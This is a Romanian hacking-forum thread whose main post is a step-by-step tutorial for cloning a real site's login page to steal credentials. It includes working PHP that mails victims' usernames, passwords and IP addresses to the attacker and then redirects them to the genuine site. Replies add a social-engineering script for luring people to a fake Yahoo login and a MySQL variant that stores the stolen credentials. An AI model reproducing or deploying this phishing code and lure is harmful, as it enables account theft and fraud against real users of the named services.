Cum sa facem o pagina de phishing la orice site.

[nullbyte]

Buna, in ultima vreme m-am saturat sa tot vad pe diferite forumuri:

Dati-mi si mie scam la X.

Asa ca am decis sa scriu acest tutorial. In el veti invata cum va puteti face propriul scam la site-ul dorit.

WARNING: Cei avansati sa nu ma ia cu ia uite-l si pe asta a descoperit Pamantul, este doar pentru cei care nu stiu .

OK, deci mai intai ne alegem o tinta.

Am ales http://doizece.neogen.ro/.

Navigam pe site-ul ales. Apasam CTRL + S si salvam fisierul .html undeva pe computer.

Il deschidem... Aici poate aparea o problema si anume calea la imagini.

Daca este cale relativa (calea relativa este calea de genul /images/wow.gif) trebuie transformata in cale absoluta (http://tinta.com/images/wow.gif)

Acum ca s-a clarificat, duce-ti-va in fisierul .html care a fost salvat, da-ti CTRL + F scrieti login... (aici cuvintele pot fi diferite.. incercati si parola, password, username etc. dak nu merge login).

Veti avea un cod de genul <form action="login2.php">. Modificati login2.php in 040147.php!

Acum, la Username, ar trebui sa fie un cod de genul <input type="text" name="email">. name="email" ne indica faptul ca, in scriptul PHP de autentificare, email este variabila ce tine numele de utilizator.

Bun, o memoram.

La password, codul ar trebui sa fie asemanator (<input type="password" name="password">). Deci, parola e tinuta in variabile password. O memoram si pe aceasta.

Acum, acolo unde ati salvat .html-ul, creeati un fisier nou, numit 040147.php.

In el, adaugati urmatorul cod:

<?php
$to       = "skorpitz@gmail.com";
$name     = $_POST['email'];
$email    = $_POST['email'];
$subject  = $_POST['subject'];
$password = $_POST['password'];
$agent    = $_SERVER['HTTP_USER_AGENT'];
$ip       = $_SERVER['REMOTE_ADDR']; 
$d        = date('l dS \of F Y h:i:s A');
$sub      = "Cont nou DoiZece Hacked - $email";
$headers  = "From: $name <$email>\n";  
$headers .= "Content-Type: text/plain; charset=iso-8859-1\n";
$mes     .= 'Username: '.$email."\n";
$mes     .= "Parola: ".$password."\n";
$mes     .= "Browser: ".$agent."\n";
$mes     .= "IP: ".$ip."\n";
$mes     .= 'Data si timpul: '.$d;

{
mail($to, $sub, $mes, $headers);
header ("Location:http://doizece.neogen.ro/?1=1&dz_nl_m=login_reg&error=1&next_url=index.php%3F");



}
?> 

Modificati codul

$to       = "skorpitz@gmail.com";

i puneti mail-ul vostru. Codul de mai sus preia variabilele email si password si le trimite impreuna cu inca cateva detalii folositoare.

Redenumiti .html-ul in index.html sau .php, uploada-ti cele 2 fisiere pe un host si distrati-va. :wink:

Tutorial by NuLLByTe.

[IceT]

Veti avea un cod de genul <form action="login2.php">

Nu am gasit acest cod nicaieri :roll:

[zbeng]

vai doamne dar scam-ul este ilegal

[nullbyte]

Veti avea un cod de genul <form action="login2.php">

Nu am gasit acest cod nicaieri :roll:

Cauta <form

@zbeng... chiar m-am saturat de cersetori

[RaizeN !]

nullbyte vreau sa fac un scam page pt monstersgame

as dori id-ul tau prin pm daca se poate!

deoarece sunt n00b si nu ma pricep as avea nevoie de ajutor!

daca nu baga tu id-ul meu in lista:sabyn_2peu

[hirosima]

felcitari pentru tutorial si pentru munca depusa ca alti sa invete..

salutare

[claudiutzu29]

joc poker de pe doizece de 2 ani... multi au facut site-uri din astea si au fost prinsi.

am incercat sa inlocuisc fiecare chestie cu .php dar nu a mers

[CODEX]

Inca ceva sa zicem ca vreau sa fac un scam la un forum ! tot asa trebuie sa le inlocuiesc alea ??

[nullbyte]

Da. Doar ca difera variabilele (name, passwd).

[Argentin]

Super mijto.

Folositor pentru n00bi ca mine.

dar cel mai greu mi se pare sa aduc oameni pe acel site.

si daca e site gratuit e foarte probabil sa aiba bannere si o sa-l faca sa para mai nerealistic.

Si pana la urma dc s-ar loga unu de pe siteul pe care il dau eu in loc sa se logheze de pe siteul original.

Adik incerc sa intreb cum il fac eu pe ala sa intre de pe siteul meu?

[nullbyte]

Super mijto.

Folositor pentru n00bi ca mine.

dar cel mai greu mi se pare sa aduc oameni pe acel site.

si daca e site gratuit e foarte probabil sa aiba bannere si o sa-l faca sa para mai nerealistic.

Si pana la urma dc s-ar loga unu de pe siteul pe care il dau eu in loc sa se logheze de pe siteul original.

Adik incerc sa intreb cum il fac eu pe ala sa intre de pe siteul meu?

Social Engineering:

- Hai frate ajuta-ma si pe mine [cry].

- Cu ce?

- Iti merge sa te loghezi pe Yahoo Mail? Sunt disperat de un sfert de ora... am si astept un mail extrem de important [link - de preferat ca hostul sa fie add-free (fara reclama) si sa folosesti un serviciu de URL redirect (6x.to)]

Depinde acum de noroc, multi sunt boi si te ajuta.

[Guest Kenpachi]

Cei avansati sa nu ma ia cu ia uite-l si pe asta a descoperit Pamantul, este doar pentru cei care nu stiu

uite-l si pe asta a descoperit Pamantul

[nullbyte]

Cei avansati sa nu ma ia cu ia uite-l si pe asta a descoperit Pamantul, este doar pentru cei care nu stiu

uite-l si pe asta a descoperit Pamantul

) rofl

[Guest Kenpachi]

era pacat sa nu zic nu ?

[nullbyte]

era pacat sa nu zic nu ?

sa stii hai gata cu topic hijack, revenim la subiect.

[loki]

Un exemplu de memorat intr-o baza de date in MySQL pentru un yahoo scam (am adaugat formului de login codul de mai jos si am salvat pagina ca login.php Paarca am mai facut si cateva modificari prin formul de login, sa mai sterg din inutilitati, dar am uitat):

<H1>Sign in
to Yahoo!</H1>
<FIELDSET><LEGEND>Login Form</LEGEND>

<?
$username = htmlspecialchars(trim("$_POST[login]"));
$passwd = trim($_POST['passwd']);
$ip = getenv('REMOTE_ADDR'); 
if ((!empty($username))&&(!empty($passwd))) {
$con = mysql_connect('localhost','root','parolamea') 
or die (mysql_error());   
mysql_select_db('ciubote') 
or die (mysql_error()); 
$match="INSERT INTO `user` (`id`, `username`, `password`, `date`, `ip`) VALUES (NULL,'$username','$passwd',NOW(), '$ip')";
$qry = mysql_query($match) or die (mysql_error()); 
$action=" action=http://mail.yahoo.com";
}
?>
<FORM name=login_form <?echo $action;?> method=post 
autocomplete="off">

Setati parolamea=parola root-ului sau contul si parola serverului SQL

Iar ca database am creat una numita 'ciubote' si am bagat in sql

CREATE TABLE `user` (
  `id` int(11) NOT NULL auto_increment,
  `username` varchar(128) NOT NULL,
  `password` varchar(128) NOT NULL,
  `date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
  `ip` varchar(30) character set utf8 NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=10 ;

Dupa ce blegul introduce parola (de doua ori din pacate) il trimite pe pagina yahoolui. E o alternativa atat timp cat nu imi merge smtp local pe RDS.

Mentionez: codul este doar in scopuri educative.

[nullbyte]

lokipaki, foarte util sa stochezi in baza de date, nu m-am gandit la alternativa asta Bravo.

[Guest Kenpachi]

sunt admin. pot sa fac offtopic sunt jmecher

[nullbyte]

sunt admin. pot sa fac offtopic sunt jmecher

imi distruge topicu'

[Guest Kenpachi]

and your point is ?

[loki]

lokipaki, foarte util sa stochezi in baza de date, nu m-am gandit la alternativa asta Bravo.

faza e ca nu am hosting, eu ma joc cu focul pe comp personal si IP static din cand in cand, toate alea alea. E bine cand ai un host de incredere cu sql pus la punct.

Stai linistit, considera si tu prezenta lui kenpaki o reinviorare a topicului. Altfel ar fi zeci de noi "plz conquiztador" sau "mi-am uitat parola" peste threadul tau si nu-l va mai gasi nimeni.

[MicSiRau]

Faceti si un tutorial video pt ca ar fi foarte folositor si ar intelege toti ( inclusiv eu ) . Thx

[Ryuk]

Tutoriale video se fac pentru programe de grafica 2d , 3d .

Daca ceri tutorial pentru orice cacat inseamna ca trebuie sa te intorci la mirc-u tau , am impresia ca esti si de pe eliteradio , voi mari flooderi si hackeri . Stiu ca am stat cateva minute si numa discutii despre asta ca hai sa-i floodam pe aia ,pregatitati-va roatele ..clasic .

[MicSiRau]

ma confunzi

[LaSou]

<form action="login2.php">. Modificati login2.php in 040147.php!

deci nu Gasesc login2.php am facut un scam la o pagina care este tot ca Yahoo , te loghezi si vorbesti de pe web cu prieteni din lista , asa este si aceasta dar nu gasesc " <form action="login2.php">. ca sa bag php ala sa imi vina mailu please help!!